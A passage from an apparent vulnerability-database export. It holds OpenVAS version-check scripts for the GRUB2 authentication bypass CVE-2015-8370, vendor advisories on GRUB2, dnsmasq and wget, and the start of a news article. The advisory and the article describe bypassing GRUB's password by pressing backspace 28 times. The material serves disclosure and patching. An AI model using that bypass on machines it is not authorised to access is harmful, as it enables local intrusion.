isdpkgvuln(pkg:\"grub-efi-ia32-dbg\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-emu\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-emu-dbg\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-firmware-qemu\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-ieee1275\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-ieee1275-bin\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-ieee1275-dbg\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-linuxbios\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-pc\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-pc-bin\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-pc-dbg\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-rescue-pc\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-theme-starfield\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-uboot\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-uboot-bin\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-uboot-dbg\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-xen\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-xen-bin\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-xen-dbg\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-xen-host\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-yeeloong\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-yeeloong-bin\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-yeeloong-dbg\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub2\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub2-common\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:52:39", "bulletinFamily": "scanner", "description": "Hector Marco and Ismael Ripoll, from\nCybersecurity UPV Research Group, found an integer underflow vulnerability in\nGrub2, a popular bootloader. A local attacker can bypass the Grub2 authentication\nby inserting a crafted input as username or password.\n\nMore information:\nhttp://hmarco.org/bugs/CVE-2015-8370-Grub2-authentication-bypass.htmlCVE-2015-8370", "modified": "2017-07-07T00:00:00", "published": "2015-12-16T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703421", "id": "OPENVAS:703421", "title": "Debian Security Advisory DSA 3421-1 (grub2 - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3421.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3421-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703421);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2015-8370\");\n script_name(\"Debian Security Advisory DSA 3421-1 (grub2 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-12-16 00:00:00 +0100 (Wed, 16 Dec 2015)\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3421.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"grub2 on Debian Linux\");\n script_tag(name: \"insight\", value: \"This is a dummy transitional package\nto handle GRUB 2 upgrades. It can be safely removed.\");\n script_tag(name: \"solution\", value: \"For the oldstable distribution (wheezy),\nthis problem has been fixed in version 1.99-27+deb7u3.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2.02~beta2-22+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.02~beta2-33.\n\nWe recommend that you upgrade your grub2 packages.\");\n script_tag(name: \"summary\", value: \"Hector Marco and Ismael Ripoll, from\nCybersecurity UPV Research Group, found an integer underflow vulnerability in\nGrub2, a popular bootloader. A local attacker can bypass the Grub2 authentication\nby inserting a crafted input as username or password.\n\nMore information:\nhttp://hmarco.org/bugs/CVE-2015-8370-Grub2-authentication-bypass.htmlCVE-2015-8370\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"grub-common\", ver:\"1.99-27+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-coreboot\", ver:\"1.99-27+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-coreboot-bin\", ver:\"1.99-27+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-efi\", ver:\"1.99-27+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-efi-amd64\", ver:\"1.99-27+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-efi-amd64-bin\", ver:\"1.99-27+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-efi-ia32\", ver:\"1.99-27+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-efi-ia32-bin\", ver:\"1.99-27+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-emu\", ver:\"1.99-27+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-firmware-qemu\", ver:\"1.99-27+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-ieee1275\", ver:\"1.99-27+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-ieee1275-bin\", ver:\"1.99-27+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-linuxbios\", ver:\"1.99-27+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-pc\", ver:\"1.99-27+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-pc-bin\", ver:\"1.99-27+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-rescue-pc\", ver:\"1.99-27+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-yeeloong\", ver:\"1.99-27+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-yeeloong-bin\", ver:\"1.99-27+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub2\", ver:\"1.99-27+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub2-common\", ver:\"1.99-27+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-common\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-coreboot\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-coreboot-bin\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-coreboot-dbg\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-efi\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-efi-amd64\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-efi-amd64-bin\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-efi-amd64-dbg\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-efi-arm\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-efi-arm-bin\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-efi-arm-dbg\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-efi-arm64\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-efi-arm64-bin\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-efi-arm64-dbg\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-efi-ia32\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-efi-ia32-bin\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-efi-ia32-dbg\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-emu\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-emu-dbg\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-firmware-qemu\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-ieee1275\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-ieee1275-bin\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-ieee1275-dbg\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-linuxbios\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-pc\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-pc-bin\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-pc-dbg\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-rescue-pc\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-theme-starfield\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-uboot\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-uboot-bin\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-uboot-dbg\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-xen\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-xen-bin\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-xen-dbg\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-xen-host\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-yeeloong\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-yeeloong-bin\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub-yeeloong-dbg\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub2\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"grub2-common\", ver:\"2.02~beta2-22+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-12-23T22:05:34", "bulletinFamily": "unix", "description": "This update for dnsmasq fixes the following issues:\n\n - CVE-2015-8899: Denial of service between local and remote dns entries\n (bsc#983273)\n\n", "modified": "2016-12-23T21:08:08", "published": "2016-12-23T21:08:08", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00094.html", "id": "SUSE-SU-2016:3269-1", "title": "Security update for dnsmasq (important)", "type": "suse", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-12-23T18:05:39", "bulletinFamily": "unix", "description": "This update for dnsmasq fixes the following issues:\n\n - CVE-2015-8899: Denial of service between local and remote dns entries\n (bsc#983273)\n\n", "modified": "2016-12-23T16:09:05", "published": "2016-12-23T16:09:05", "id": "SUSE-SU-2016:3257-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00092.html", "type": "suse", "title": "Security update for dnsmasq (important)", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-12-20T18:05:35", "bulletinFamily": "unix", "description": "This update for dnsmasq fixes the following issues:\n\n - CVE-2015-8899: Denial of service between local and remote dns entries\n (bsc#983273)\n\n", "modified": "2016-12-20T17:07:48", "published": "2016-12-20T17:07:48", "id": "SUSE-SU-2016:3199-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00074.html", "type": "suse", "title": "Security update for dnsmasq (important)", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-01-03T22:05:23", "bulletinFamily": "unix", "description": "This update for dnsmasq fixes the following issues:\n\n - CVE-2015-8899: Denial of service between local and remote dns entries\n (bsc#983273)\n\n This update was imported from the SUSE:SLE-12-SP1:Update update project.\n\n", "modified": "2017-01-03T20:07:59", "published": "2017-01-03T20:07:59", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-01/msg00004.html", "id": "OPENSUSE-SU-2017:0016-1", "type": "suse", "title": "Security update for dnsmasq (important)", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:08:03", "bulletinFamily": "unix", "description": "This update for grub2 provides the following fixes and enhancements:\n\n Security issue fixed:\n - Fix buffer overflows when reading username and password. (bsc#956631,\n CVE-2015-8370)\n\n Non security issues fixed:\n - Expand list of grub.cfg search path in PV Xen guests for systems\n installed\n on btrfs snapshots. (bsc#946148, bsc#952539)\n - Add --image switch to force zipl update to specific kernel. (bsc#928131)\n - Do not use shim lock protocol for reading PE header as it won't be\n available when secure boot is disabled. (bsc#943380)\n - Make firmware flaw condition be more precisely detected and add debug\n message for the case.\n\n", "modified": "2015-12-30T12:10:45", "published": "2015-12-30T12:10:45", "id": "SUSE-SU-2015:2399-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00044.html", "type": "suse", "title": "Security update for grub2 (important)", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:57:20", "bulletinFamily": "unix", "description": "- Fix buffer overflows when reading username and password. (bsc#956631,\n CVE-2015-8370)\n - Check MS-DOS header to find PE file header. (bsc#954126)\n - Use dirname for copying Xen kernel and initrd to esp. (bsc#955493)\n - Fix reading password by grub2-mkpasswd-pbdk2 without controlling tty.\n (bsc#954519)\n - Add luks, gcry_rijndael and gcry_sha1 to signed EFI image to support\n LUKS partition in default setup. (bsc#917427, bsc#955609)\n - Expand list of grub.cfg search path in PV Xen guests for systems\n installed on btrfs snapshots. (bsc#946148, bsc#952539)\n\n", "modified": "2015-12-29T12:13:10", "published": "2015-12-29T12:13:10", "id": "SUSE-SU-2015:2387-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00041.html", "title": "Security update for grub2 (important)", "type": "suse", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:48:10", "bulletinFamily": "unix", "description": "This update for grub2 fixes the following issue:\n\n Changes in grub2:\n - CVE-2015-8370: Fix for overflow in grub_password_get and grub_user_get\n functions (bnc#956631)\n\n", "modified": "2015-12-27T01:15:34", "published": "2015-12-27T01:15:34", "id": "OPENSUSE-SU-2015:2375-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00037.html", "title": "Security update for grub2 (important)", "type": "suse", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:57:20", "bulletinFamily": "unix", "description": "This update for grub2 provides the following fixes:\n\n A security issues with a bufferoverflow when reading username and password\n was fixed (bsc#956631, CVE-2015-8370)\n\n Bugs fixed:\n - Expand list of grub.cfg search path in PV Xen guests for systems\n installed on btrfs snapshots. (bsc#946148, bsc#952539)\n - Add grub.xen config searching path on boot partition. (bsc#884828)\n - Add linux16 and initrd16 to grub.xen. (bsc#884830)\n\n", "modified": "2015-12-29T12:12:01", "published": "2015-12-29T12:12:01", "id": "SUSE-SU-2015:2386-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00040.html", "title": "Security update for grub2 (important)", "type": "suse", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:30:36", "bulletinFamily": "unix", "description": "- Fix buffer overflows when reading username and password. (bsc#956631,\n CVE-2015-8370)\n - Check MS-DOS header to find PE file header. (bsc#954126)\n - Use dirname for copying Xen kernel and initrd to esp. (bsc#955493)\n - Fix reading password by grub2-mkpasswd-pbdk2 without controlling tty.\n (bsc#954519)\n - Add luks, gcry_rijndael and gcry_sha1 to signed EFI image to support\n LUKS partition in default setup. (bsc#917427, bsc#955609)\n - Expand list of grub.cfg search path in PV Xen guests for systems\n installed on btrfs snapshots. (bsc#946148, bsc#952539) This update was\n imported from the SUSE:SLE-12-SP1:Update update project.\n\n", "modified": "2016-01-06T22:10:56", "published": "2016-01-06T22:10:56", "id": "OPENSUSE-SU-2016:0036-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00003.html", "title": "Security update for grub2 (important)", "type": "suse", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:47:01", "bulletinFamily": "unix", "description": "This update for grub2 provides the following fixes:\n\n A security issues with a bufferoverflow when reading username and password\n was fixed (bsc#956631, CVE-2015-8370)\n\n Also following bugs were fixed:\n - Fix buffer overflows when reading username and password. (bsc#956631,\n CVE-2015-8370)\n - Expand list of grub.cfg search path in PV Xen guests for systems\n installed\n on btrfs snapshots. (bsc#946148, bsc#952539)\n - Add grub.xen config searching path on boot partition. (bsc#884828)\n - Add linux16 and initrd16 to grub.xen. (bsc#884830)\n\n", "modified": "2015-12-29T12:10:33", "published": "2015-12-29T12:10:33", "id": "SUSE-SU-2015:2385-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00039.html", "title": "Security update for grub2 (important)", "type": "suse", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:40", "bulletinFamily": "unix", "description": "\n reports:\n\nDnsmasq before 2.76 allows remote servers to cause a denial\n\t of service (crash) via a reply with an empty DNS address that has an (1)\n\t A or (2) AAAA record defined locally.\n\n", "modified": "2016-06-30T00:00:00", "published": "2016-04-18T00:00:00", "id": "875E4CF8-3F0E-11E6-B3C8-14DAE9D210B8", "href": "https://vuxml.freebsd.org/freebsd/875e4cf8-3f0e-11e6-b3c8-14dae9d210b8.html", "title": "dnsmasq -- denial of service", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:32:27", "bulletinFamily": "unix", "description": "\nDawid Golunski reports:\n\nGNU wget in version 1.17 and earlier, when used in\n\t mirroring/recursive mode, is affected by a Race Condition\n\t vulnerability that might allow remote attackers to bypass intended\n\t wget access list restrictions specified with -A parameter.\n\t \n\n", "modified": "2016-11-24T00:00:00", "published": "2016-11-24T00:00:00", "id": "479C5B91-B6CC-11E6-A04E-3417EB99B9A0", "href": "https://vuxml.freebsd.org/freebsd/479c5b91-b6cc-11e6-a04e-3417eb99b9a0.html", "title": "wget -- Access List Bypass / Race Condition", "type": "freebsd", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2019-05-29T19:21:41", "bulletinFamily": "unix", "description": "Edwin T\u00f6r\u00f6k discovered that Dnsmasq incorrectly handled certain CNAME responses. A remote attacker could use this issue to cause Dnsmasq to crash, resulting in a denial of service.", "modified": "2016-06-20T00:00:00", "published": "2016-06-20T00:00:00", "id": "USN-3009-1", "href": "https://usn.ubuntu.com/3009-1/", "title": "Dnsmasq vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T17:23:31", "bulletinFamily": "unix", "description": "Hector Marco and Ismael Ripoll discovered that GRUB incorrectly handled the backspace key when configured to use authentication. A local attacker could use this issue to bypass GRUB password protection.", "modified": "2015-12-15T00:00:00", "published": "2015-12-15T00:00:00", "id": "USN-2836-1", "href": "https://usn.ubuntu.com/2836-1/", "title": "GRUB vulnerability", "type": "ubuntu", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:17:35", "bulletinFamily": "info", "description": "[](<https://3.bp.blogspot.com/-4w5HQf-sIaY/VnKBNoYgdsI/AAAAAAAAl1M/LO9BI3wKjmg/s1600/hack-linux-grub-password.gif>)\n\nSo what would anyone need to bypass password protection on your computer?\n\n \n\n\nIt just needs to **hit the backspace key 28 times**, for at least the computer running Linux operating system.\n\n \n\n\nWait, what?\n\n \n\n\nA pair of security researchers from the University of Valencia have uncovered a bizarre bug in several distributions of Linux that could allow anyone to bypass any kind of authentication 